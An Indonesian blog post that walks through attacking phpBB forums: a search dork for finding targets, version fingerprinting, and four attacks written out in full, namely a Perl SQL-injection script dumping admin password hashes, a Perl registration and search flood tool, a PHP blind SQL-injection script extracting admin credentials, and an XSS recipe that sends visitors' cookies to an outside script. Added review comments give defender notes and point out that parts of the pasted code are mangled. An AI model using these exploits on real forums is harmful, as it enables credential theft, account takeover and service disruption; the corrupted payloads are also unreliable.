Selasa, 21 Februari 2012

hack-phpbb2-forums

Cari targetnya dulu. Pakai dork ini bisa:
"Powered by phpBB"
(Catatan: dork ini menjaring semua versi phpBB — termasuk phpBB3 dan rilis 2.0.x yang sudah dipatch, yang tidak kena exploit di bawah — jadi versinya tetap harus dicek. Dan ingat: uji hanya di forum yang memang Anda punya izin untuk mengujinya.)


Kalau sudah ketemu, tinggal dicek versi berapa. Caranya lewat file ini: www.site.com/forum/docs/CHANGELOG.htm
(Catatan: CHANGELOG.htm sering dihapus admin atau tidak ikut diperbarui waktu upgrade, jadi versi yang tertulis di sana belum tentu versi yang benar-benar jalan — cocokkan dengan ciri lain. Buat admin forum: hapus direktori docs/ dari webroot supaya versi tidak semudah itu di-fingerprint.)


Kalau sudah tahu versinya, sekarang cari exploitnya.

Ini ada beberapa exploit. Catatan: semuanya exploit lama untuk phpBB 2.0.x yang belum dipatch dan phpBB 3.0 awal (lihat versi target di header masing-masing skrip); forum yang sudah di-update ke rilis yang memperbaiki bug tersebut tidak terpengaruh. Beberapa skrip di bawah juga rusak/tergeser baris waktu di-copy-paste (spasi nyelip di tengah payload, karakter non-ASCII jadi "*********"), sehingga apa adanya tidak akan jalan.


1. phpBB 2.0.x Remote Exploit — SQL injection di parameter search_id pada search.php (menurut header skripnya: phpBB <= 2.0.6, Desember 2003; mengembalikan hash MD5 password user yang dipilih)


#!/usr/bin/perl -w
# RusH security team PoC for the phpBB 2.0.x search.php "search_id" SQL
# injection (the banner below says phpBB <= 2.0.6, dated 16/12/2003).
#
# What it does: one GET to /<folder>/search.php with a UNION SELECT appended to
# search_id. The UNION builds a PHP-serialized search-result structure
# (a:7:{s:14:"search_results";... s:12:"split_search";a:1:{i:0;s:32:"<hash>";}
# ...}) whose only "search word" is user_password of <user_id> taken from
# phpbb_users; the forum rebuilds its result page from that structure and the
# search word ends up in the highlight= parameter of the result links, which
# the loop at the bottom picks out of the response.
#
# NOTE(review): the payload as pasted is mangled by line wrapping on the forum
# it was copied from — spaces inside "%2  0", "11  5", "59  ,97", "125))  %20"
# and char() list fragments pushed onto lines of their own ("," / "1" / "9" /
# "5"). This is not the request the original tool sent; left byte-for-byte as
# found, not repaired.
#
# NOTE(review, defender side): phpBB 2.0.x kept user_password as an unsalted
# MD5 (the sample hash below is md5("password")), so one leaked hash is
# usually enough. The request is a GET to search.php whose search_id contains
# "union select" / "concat(char(" and ends in "/*" — easy to alert on in
# access logs or block at a WAF — but the only real remedy is moving off the
# affected 2.0.x releases; phpBB2 has been end-of-life for many years.
use IO::Socket;

## PROOF-OF-CONCEPT
## * works only with MySQL > 4.0 (the payload relies on UNION SELECT)     [translated from Russian]
## * works only if the very first post on the forum has not been deleted  [translated from Russian]
##
## Example:
## C:\>r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2
## [~] prepare to connect...
## [+] connected
## [~] prepare to send data...
## [+] OK
## [~] wait for response...
## [+] MD5 Hash for user with id=2 is: 5f4dcc3b5aa765d61d8327deb882cf99
##

# Usage banner; exactly four positional arguments are expected.
if (@ARGV < 4)
{
print "\n\n";
print "|*************************************************  ***************|\n";
print " r57phpbb.pl\n";
print " phpBB v<=2.06 search_id sql injection exploit (POC version)\n";
print " by RusH security team // www.rsteam.ru , http://rst.void.ru\n";
print " coded by f3sy1 & 1dt.w0lf // 16/12/2003\n";
print " Usage: r57phpbb-poc.pl <server> <folder> <user_id> <search_id>\n";
print " e.g.: r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2\n";
print " [~] <server> - server ip\n";
print " [~] <folder> - forum folder\n";
print " [~] <user_id> - user id (2 default for phpBB admin)\n";
print " [~] <search_id> - play with this value for results\n";
print "|*************************************************  ***************|\n";
print "\n\n";
exit(1);
}

# No "use strict": everything below is a package global.
$success = 0;
$server = $ARGV[0];     # banner says IP, but IO::Socket::INET resolves host names too
$folder = $ARGV[1];     # forum directory name, no slashes
$user_id = $ARGV[2];    # 2 is phpBB2's default administrator account
$search_id = $ARGV[3];  # an existing search id; the banner says to "play with" it
print "[~] prepare to connect...\n";
# Plain TCP to port 80 (no TLS). Note the "|| die" message interpolates
# $socket, which is undef exactly when the constructor has failed.
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "$socket error $!";
print "[+] connected\n";
print "[~] prepare to send data...\n";
# PROOF-OF-CONCEPT reguest...
# NOTE(review): HTTP/1.0 with no Host header — on a name-based virtual host the
# request is served by the default site, not necessarily the forum's.
print $socket "GET /$folder/search.php?search_id=$search_id%20union%20select%2  0concat(char(97,58,55,58,123,115,58,49,52,58,34,11  5,101,97,114,99,104,95,114,101,115,117,
108,116,115,34,59,115,58,49,58,34,49,34,59,115,58,  49,55,58,34,116,111,116,97,108
,
95,109,97,116,99,104,95,99,111,117,110,116,34,59,1  05,58,53,59,115,58,49,50,58,34
,
115,112,108,105,116,95,115,101,97,114,99,104,34,59  ,97,58,49,58,123,105,58,48,59,
1
15,58,51,50,58,34),user_password,char(34,59,125,11  5,58,55,58,34,115,111,114,116,95,98,121,34,59,105,  58,48,59,115,5
8,56,58,34,115,111,114,116,95,100,105,114,34,59,11  5,58,52,58,34,68,69,83,67,34,5
9
,115,58,49,50,58,34,115,104,111,119,95,114,101,115  ,117,108,116,115,34,59,115,58,
5
4,58,34,116,111,112,105,99,115,34,59,115,58,49,50,  58,34,114,101,116,117,114,110,
9
5,99,104,97,114,115,34,59,105,58,50,48,48,59,125))  %20from%20phpbb_users%20where%20user_id=$user_id/* HTTP/1.0\r\n\r\n";
print "[+] OK\n";
print "[~] wait for response...\n";
# Scan every response line for a ";highlight=" link. The '='-separated value
# after the first ';' is the highlight parameter, i.e. the injected hash; any
# '&' that follows is turned into a space. Prints once per matching line, so
# the same hash may be echoed several times.
while ($answer = <$socket>)
{
if ($answer =~ /;highlight=/)
{
$success = 1;
@result=split(/;/,$answer);
@result2=split(/=/,$result[1]);
$result2[1]=~s/&/ /g;
print "[+] MD5 Hash for user with id=$user_id is: $result2[1]\n";
}
}
if ($success==0) {print "[-] exploit failed =(\n";}
## o---[ RusH security team | www.rsteam.ru | 2003 ]---o 


2. phpBB 2.0.19 "DoS" — sebenarnya tool flood (spam registrasi akun, atau pencarian full-text berulang), bukan exploit kerentanan tertentu; diklaim teruji di 2.0.19 ke bawah




#!/usr/bin/perl 
####################################### 
##********* *********Recoded by: mix2mix and Elioni of http://ahg-khf.org
##********* *********And h4cky0u Security Forums (http://h4cky0u.org) 
##********* *********Name: phpBBDoSReloaded
##********* *********Original Author: HaCkZaTaN of Neo Security Team 
##********* *********Tested on phpBB 2.0.19 and earlier versions
##********* *********Ported to perl by g30rg3_x
##********* *********Date: 25/01/06
####################################### 
# NOTE(review): what this actually is. Not an exploit of a specific bug but a
# resource-exhaustion flood against two expensive phpBB 2.0.x entry points:
#   mode 1 - up to 9999 POSTs to profile.php (mode=register), each creating a
#            throw-away account "AHG__<n>" / "AHG__<n>@ahg-crew.org" with the
#            password 0123456;
#   mode 2 - up to 9999 POSTs to search.php?mode=results, each an "any words"
#            full-text search whose keyword changes every time so nothing is
#            served from cache.
# "Visual Confirmation" is phpBB2's registration CAPTCHA: with it enabled mode 1
# cannot complete registrations, which is why mode 2 exists.
#
# NOTE(review, defender side): every request is trivially fingerprintable —
# fixed User-Agent "Mozilla/5.0 (BeOS; ... Firefox/1.0.4", a Referer equal to
# the bare host name, sequential AHG__<n> usernames / ahg-crew.org e-mails in
# mode 1, "Albanian Hackers Group Proof of Co  ncept <n>" as the search string
# in mode 2. Per-IP rate limiting on profile.php and search.php, the forum's
# own search flood-interval setting (where available) and keeping visual
# confirmation on blunt it; cleaning up the AHG__* accounts is the residual
# work after an incident.
#
# NOTE(review): the "*********" runs below are not code — they are characters
# (tabs / non-breaking spaces in the code, "ë" in the Albanian comments) that
# were mangled when the script was re-posted; they are left byte-for-byte. The
# Albanian comments are translated to English here; the Albanian die() strings
# are runtime text and are not touched. Further nits: no "use strict"; chop()
# is used where chomp() was meant (drops the last character even without a
# newline); HTTP header lines end in "\n" instead of "\r\n"; Content-Length is
# computed before the trailing "\n" appended to the body; "Connection:
# Keep-Alive" is sent but the socket is closed after every request anyway.
use IO::Socket; 
## Initialized X 
$x = 0; 
print q(
********* phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN
********* Recoded by Albanian Hackers Group &
********* h4cky0u Security Forums       
); print q(Host |without-> http://www.| ); 
$host = <STDIN>; 
chop ($host); 
print q(Path |example-> /phpBB2/ or /| ); 
$pth = <STDIN>; 
chop ($pth); 
print q(Flood Type |1 = If Visual Confirmation is disabled, 2 = If Visual Confirmation is enabled| ); 
$type = <STDIN>; 
chop ($type); 
## Mode 1: registration flood  [translated from Albanian]
if($type == 1){ 
## User Loop for 9999 loops (enough for Flood xDDDD) 
while($x != 9999) { 
## The member that gets registered automatically: "X" is appended to the name  [translated]
$uname = "username=AHG__" . "$x"; 
## The e-mail that gets registered, also derived from "X"  [translated]
$umail = "&email=AHG__" . "$x"; 

## Full phpBB2 registration form body (profile.php mode=register); every
## account gets the password 0123456.
$postit = "$uname"."$umail"."%40ahg-crew.org&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit"; 

$lrg = length $postit; 
## One new TCP connection per request, plain HTTP on port 80. The die()
## message is Albanian ("cannot connect to the host ... or it does not exist").
my $sock = new IO::Socket::INET ( ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* *********PeerAddr => "$host", ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* *********PeerPort => "80", ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* *********Proto => "tcp", ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ); die "\nNuk mundem te lidhemi me hostin sepse *********sht dosirat ose nuk egziston: $!\n" unless $sock; 
## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums 
print $sock "POST $pth"."profile.php HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n"; print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Accept-Encoding: gzip, deflate\n"; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Connection: Keep-Alive\n"; print $sock "Cache-Control: no-cache\n"; print $sock "Content-Length: $lrg\n\n"; print $sock "$postit\n"; 
## The response is never read; the socket is simply closed.
close($sock); 
## Print a "+" for every loop 
syswrite STDOUT, "+"; 

$x++; } 
## Mode 2: search flood  [translated from Albanian]
} elsif ($type == 2){ 
while($x != 9999) { ## Final Search String to Send 
## The "Co  ncept" split is a re-posting artifact inside the runtime string.
$postit = "search_keywords=Albanian+Hackers+Group+Proof+of+Co  ncept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200"; 
## Posit Length 
$lrg = length $postit; 
## Connect Socket with Variables Provided By User 
my $sock = new IO::Socket::INET ( ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* *********PeerAddr => "$host", ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* *********PeerPort => "80", ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* *********Proto => "tcp", ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ); die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock; 
## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums 
print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"; print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Accept-Encoding: gzip, deflate\n"; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Connection: Keep-Alive\n"; print $sock "Cache-Control: no-cache\n"; print $sock "Content-Length: $lrg\n\n"; print $sock "$postit\n"; 
close($sock); 
## Print a "+" for every loop 
syswrite STDOUT, "+"; 
## Increment X in One for every Loop 
$x++; } }else{ ## Anything else: unknown mode; the Albanian die() below says the option is not allowed  [translated]
********* *********die "Mund*********sia nuk Lejohet +_-???\n"; }  


3. phpBB 3.0 Remote SQL Injection — blind SQL injection di parameter "ip" pada memberlist.php (mode=searchuser); BUTUH akun global moderator yang valid (bukan unauthenticated), mengeluarkan username dan hash password admin per karakter




#!/usr/bin/php -q -d short_open_tag=on
<?
// rgod's phpBB 3.0 exploit: boolean-blind SQL injection through the "ip" field
// of the member search (memberlist.php?mode=searchuser), used to read the
// target user's username and password hash one character at a time. The
// request/oracle details are commented where the loops are built, below.
//
// NOTE(review): this is an *authenticated* attack — the usage text requires a
// valid account with global moderator rights (presumably because the search-
// by-IP feature is moderator-only), so the exposure is "moderator -> admin
// hash", not "anonymous -> admin". Detection signatures: POSTs to
// memberlist.php?mode=searchuser whose ip= field contains UNION SELECT /
// SUBSTRING(, paced about one request every 2 s from a single session (see the
// sleep(2) calls below). Mitigation is upgrading past the affected 3.0 release;
// phpBB 3.0 is itself long end-of-life.
//
// NOTE(review): the script relies on ereg()/eregi() and "<?" short tags, which
// are gone in PHP 7+, and silences all diagnostics with error_reporting(0); it
// will not run unmodified on a current PHP. The "*********" runs inside the
// usage strings below are characters mangled when the script was re-posted
// and are left as found (they are runtime text).
echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure\n";
echo "by rgod rgod@autistici.org\n";
echo "site: http://retrogod.altervista.org\n";
echo "dork, version specific: \"Powered by phpBB * 2002, 2006 phpBB Group\"\n\n";
/*
works regardless of php.ini settings
you need a global moderator account with "simple moderator" role
*/
// Usage: four positionals (host path user pass) plus optional -T/-p/-P/-u/-x.
if ($argc<5) {
echo "Usage: php ".$argv[0]." host path user pass OPTIONS\n";
echo "host:********* ********* ********* target server (ip/hostname)\n";
echo "path:********* ********* ********* path to phpbb3\n";
echo "user/pass: u need a valid user account with global moderator rights\n";
echo "Options:\n";
echo "********* *********-T[prefix]********* *********specify a table prefix different from default (phpbb_)\n";
echo "********* *********-p[port]:********* ********* specify a port other than 80\n";
echo "********* *********-P[ip:port]: specify a proxy\n";
echo "********* *********-u[number]:********* specify a user id other than 2 (admin)\n";
echo "********* *********-x:********* ********* ********* ********* ********* disclose table prefix through error messages\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u\r\n";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7\n";
die;
}

// Hide every notice/warning (including the ones this script itself triggers),
// never time out (hundreds of probes follow), 5 s per socket read.
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
// Debug helper: returns a hex line followed by a printable-ASCII line for
// $string (non-printables rendered as "."), wrapping every 15 bytes.
// NOTE(review): not called anywhere in this script. The two $result.= string
// literals contain "*********" runs — characters (probably whitespace) mangled
// when the script was re-posted — so the "ASCII" line is not what the author
// produced; left as found since the original bytes are unknowable. The "|" on
// the range test is a bitwise OR where "||" was meant; it works only because
// both operands are booleans.
function quick_dump($string)
{
********* $result='';$exa='';$cont=0;
********* for ($i=0; $i<=strlen($string)-1; $i++)
********* {
********* *********if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
********* *********{$result.="********* .";}
********* *********else
********* *********{$result.="********* ".$string[$i];}
********* *********// zero-pad single-digit hex values to two characters
********* *********if (strlen(dechex(ord($string[$i])))==2)
********* *********{$exa.=" ".dechex(ord($string[$i]));}
********* *********else
********* *********{$exa.=" 0".dechex(ord($string[$i]));}
********* *********$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
********* }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\B)  ';
// Sends one raw HTTP request ($packet, headers and body already built by the
// caller) either directly to $host:$port or via $proxy, and leaves the whole
// response in the global $html. Plain fsockopen(): no TLS. Everything is
// passed through globals ($proxy, $host, $port, $html, $proxy_regex).
//
// NOTE(review): the proxy branch is broken as pasted — "$h  tml" on the loop
// condition has a space inserted by re-posting and is a parse error. Even with
// that repaired, the loop condition uses "or": it keeps reading while the
// socket is not at EOF *or* no CRLFCRLF has been seen, so a connection that
// closes without ever sending a blank line (or a proxy that answers nothing)
// makes fread() return '' forever and the loop never ends; "and" was probably
// intended. eregi() was removed in PHP 7.0.
function sendpacketii($packet)
{
********* global $proxy, $host, $port, $html, $proxy_regex;
********* if ($proxy=='') {
********* ********* $ock=fsockopen(gethostbyname($host),$port);
********* ********* if (!$ock) {
********* ********* ********* echo 'No response from '.$host.':'.$port; die;
********* ********* }
********* }
********* else {
********* *********// validate "ip:port" (see $proxy_regex above) and connect to the proxy instead
********* *********$c = preg_match($proxy_regex,$proxy);
********* ********* if (!$c) {
********* ********* ********* echo 'Not a valid proxy...';die;
********* ********* }
********* ********* $parts=explode(':',$proxy);
********* ********* echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
********* ********* $ock=fsockopen($parts[0],$parts[1]);
********* ********* if (!$ock) {
********* ********* ********* echo 'No response from proxy...';die;
********* *********}
********* }
********* fputs($ock,$packet);
********* if ($proxy=='') {
********* ********* // direct: read line by line until the server closes (Connection: Close is sent)
********* ********* $html='';
********* ********* while (!feof($ock)) {
********* ********* ********* $html.=fgets($ock);
********* ********* }
********* }
********* else {
********* ********* // via proxy: read byte by byte (see the NOTE above about this condition)
********* ********* $html='';
********* ********* while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h  tml))) {
********* ********* ********* $html.=fread($ock,1);
********* ********* }
********* }
********* fclose($ock);
********* #debug
********* #echo "\r\n".$html;
}

// --- argument parsing -------------------------------------------------------
// Positionals: host path user pass. Options are recognised by their first two
// characters anywhere from argv[3] onwards.
$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];
$port=80;
// Upper-cased because the whole injected statement goes through strtoupper()
// before it is sent (see the probe loops below).
$prefix="PHPBB_";
$user_id="2";//admin — phpBB's default administrator account id
$discl=0;
$proxy="";
// NOTE(review): the scan starts at $i=3, so the *user and pass positionals*
// are also inspected for options — a password beginning with -p, -P, -T, -u or
// -x is silently misparsed. $argv[$i][1] on a one-character argument raises a
// notice that error_reporting(0) above hides.
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
********* $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
********* $proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
********* $prefix=str_replace("-T","",$argv[$i]);
}
if ($temp=="-u")
{
********* $user_id=str_replace("-u","",$argv[$i]);
}
if ($temp=="-x")
{
********* $discl=1;
}
}
// path must look like /dir/ — leading and trailing slash
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
// through a proxy the request line needs an absolute URI
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

// --- log in as the supplied (moderator) account -----------------------------
// Plain HTTP/1.0 POST to ucp.php?mode=login; afterwards every Set-Cookie
// header of the reply is scraped into $cookie for the probes that follow.
$data="username=".urlencode($user);
$data.="&password=".urlencode($pass);
$data.="&redirect=index.php";
$data.="&login=Login";
$packet="POST ".$p."ucp.php?mode=login HTTP/1.0\r\n";
$packet.="Referer: http://$host$path/ucp.php?mode=login\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$cookie="";
$temp=explode("Set-Cookie: ",$html);
for ($i=1; $i<=count($temp)-1; $i++)
{
 $temp2=explode(" ",$temp[$i]);
 $cookie.=" ".$temp2[0];
}
// NOTE(review): the login-failure check is disabled. Judging by the commented
// out die("Unable to login..."), "_u=1;" in the cookie means the session is
// still the anonymous user, i.e. the credentials were rejected — but the
// script carries on. In that case the oracle string never appears in any
// reply, the first candidate (chr(0)) is accepted for both loops at once, and
// the run ends with empty results and "Exploit failed...".
if (eregi("_u=1;",$cookie))
{
//echo $html."\n";//debug
//die("Unable to login...");
}
echo "cookie -> ".$cookie."\r\n";
// --- optional (-x): disclose the table prefix through a MySQL error ----------
// Sends an ip value with an unbalanced quote; if the board shows raw database
// errors to a logged-in user, the message quotes the failing query and the
// token right before "posts" (i.e. the table name "<prefix>posts") is taken as
// the prefix. The parsing is fragile: it uses the first occurrence of "posts"
// anywhere in the page, and the result is upper-cased like everything else.
if ($discl)
{
$sql="'suntzuuuuu";
echo "sql -> ".$sql."\n";
$sql=urlencode(strtoupper($sql));
// Same member-search form as the probes below, with only "ip" filled in.
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
// The query string also carries ip=%5C%27 (a backslash-quote); presumably the
// POST body value is the one the application uses.
$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: ".$cookie." \r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (strstr($html,"You have an error in your SQL syntax"))
{
$temp=explode("posts",$html);
$temp2=explode(" ",$temp[0]);
$prefix=strtoupper($temp2[count($temp2)-1]);
echo "prefix -> ".$prefix."\n";sleep(2);
}
}

// --- extract user_password of $user_id, one character at a time ------------
// Candidate alphabet: NUL (end-of-string marker) plus 0-9 and a-f, i.e. the
// script assumes a 32-character lowercase hex MD5 in user_password (see
// is_hash() at the end). NOTE(review): later phpBB 3.0 builds store salted
// phpass "$H$..." hashes, which contain characters outside this alphabet and
// would make the loop end in "Exploit failed..." at the first such position.
$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));
$j=1;$password="";
// Runs until a NUL "matches": SUBSTRING() past the end of the string yields
// '' and ASCII('') is 0, which is how the end is detected.
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$md5s))
{
// Boolean-blind probe. The leading "1.1.1.999')" closes the IN (...) list the
// application builds around the ip value; the first UNION yields $user_id when
// the guessed byte is right and -1 otherwise; the trailing "UNION ... IN ('"
// re-opens a list so the application's own closing quote/paren still parses.
// A right guess therefore makes the member search return the target user, a
// wrong one returns nobody.
********* $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
********* echo "sql -> ".$sql."\n";
********* $sql=urlencode(strtoupper($sql));
********* $data="username=";
********* $data.="&icq=";
********* $data.="&email=";
********* $data.="&aim=";
********* $data.="&joined_select=lt";
********* $data.="&joined=";
********* $data.="&yahoo=";
********* $data.="&active_select=lt";
********* $data.="&active=";
********* $data.="&msn=";
********* $data.="&count_select=eq";
********* $data.="&count=";
********* $data.="&jabber=";
********* $data.="&sk=c";
********* $data.="&sd=a";
********* $data.="&ip=".$sql;
********* $data.="&search_group_id=0";
********* $data.="&submit=Search";
********* $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
********* $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
********* $packet.="Host: ".$host."\r\n";
********* $packet.="Content-Length: ".strlen($data)."\r\n";
********* $packet.="Connection: Close\r\n";
********* $packet.="Cookie: ".$cookie." \r\n\r\n";
********* $packet.=$data;
********* sendpacketii($packet);
// Oracle: absence of the "no members" message means the guessed byte matched.
// sleep(2) paces the probes; with 17 candidates that is up to ~34 s per char.
********* if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
********* }
// Inside the for: reached with $i==255 only when no candidate matched (255 is
// not in the alphabet, so the if-block above is skipped on that iteration).
********* if ($i==255) {die("Exploit failed...");}
}
$j++;
}

// --- extract username of $user_id, one character at a time ------------------
// Same probe as above but over the full byte range 0..255 (usernames are not
// hex), with the same NUL end marker and the same oracle.
$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
********* $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
********* echo "sql -> ".$sql."\n";
********* $sql=urlencode(strtoupper($sql));
********* $data="username=";
********* $data.="&icq=";
********* $data.="&email=";
********* $data.="&aim=";
********* $data.="&joined_select=lt";
********* $data.="&joined=";
********* $data.="&yahoo=";
********* $data.="&active_select=lt";
********* $data.="&active=";
********* $data.="&msn=";
********* $data.="&count_select=eq";
********* $data.="&count=";
********* $data.="&jabber=";
********* $data.="&sk=c";
********* $data.="&sd=a";
********* $data.="&ip=".$sql;
********* $data.="&search_group_id=0";
********* $data.="&submit=Search";
********* $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
********* $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
********* $packet.="Host: ".$host."\r\n";
********* $packet.="Content-Length: ".strlen($data)."\r\n";
********* $packet.="Connection: Close\r\n";
********* $packet.="Cookie: ".$cookie." \r\n\r\n";
********* $packet.=$data;
********* sendpacketii($packet);
// The "password ->" label here is a copy-paste leftover; it prints the username.
********* if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]\r\n";sleep(2);break;}
********* }
// NOTE(review): unlike the password loop, this test sits *after* the for, where
// $i is 256 when no byte matched — so exhaustion is never detected, $j is
// advanced and the while loop keeps probing forever (256 requests per pass).
// It only fires when the matched byte happens to be 255.
********* if ($i==255) {die("Exploit failed...");}
$j++;
}
echo "--------------------------------------------------------------------\r\n";
echo "admin********* ********* ********* ********* ********* -> ".$admin."\r\n";
echo "password (md5) -> ".$password."\r\n";
echo "--------------------------------------------------------------------\r\n";
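// True when $hash, after trim() (which also strips the trailing chr(0) the
// extraction loop above appends), is exactly 32 lowercase hex characters —
// i.e. looks like the unsalted MD5 this script expects in user_password.
// Anchored at both ends (the original ereg() pattern only anchored the start,
// so any longer string with a 32-hex prefix passed) and ported off ereg(),
// which was removed in PHP 7.0.
function is_hash($hash)
{
 return preg_match('/\A[a-f0-9]{32}\z/', trim($hash)) === 1;
}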
// Final verdict: success only if the recovered password looks like a 32-hex
// MD5 (see is_hash()); the recovered username is not validated at all.
if (is_hash($password)) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?>


4. XSS di phpBB 3.0 lewat upload attachment — bergantung pada Internet Explorer lama yang me-render file .gif berisi script sebagai HTML (content sniffing); lihat catatan di bawah




Open a text editor such as Notepad and enter the following script:
<script> document.location.replace ( 'http://WWW.SITOWEB/FILE.php?c =' + document.cookie); </ script>

Save the file as img.gif (i.e. with a .GIF extension, even though its content is script).

When you are writing a post, scroll down to "Attachment uploading".

Select your "image" and upload it.

At the bottom, under "Posted attachments", the uploaded file is listed, e.g. ciao.gif.

Now take the direct link to the file. E.g.:

http://sito_web/phpBB3/files/2_bef6678eecdd2b36db36dd7ed1544ecd.gif
Now just disguise the link. Example:
[url = http://sito_web/phpBB3/files/2_bef6678eecdd2b36db36dd7ed1544ecd.gif] Bella girl[/url]
Anyone who visits the link with (old) Internet Explorer gets the "image" rendered as HTML: the script runs in the forum's origin and sends their cookies to FILE.php.
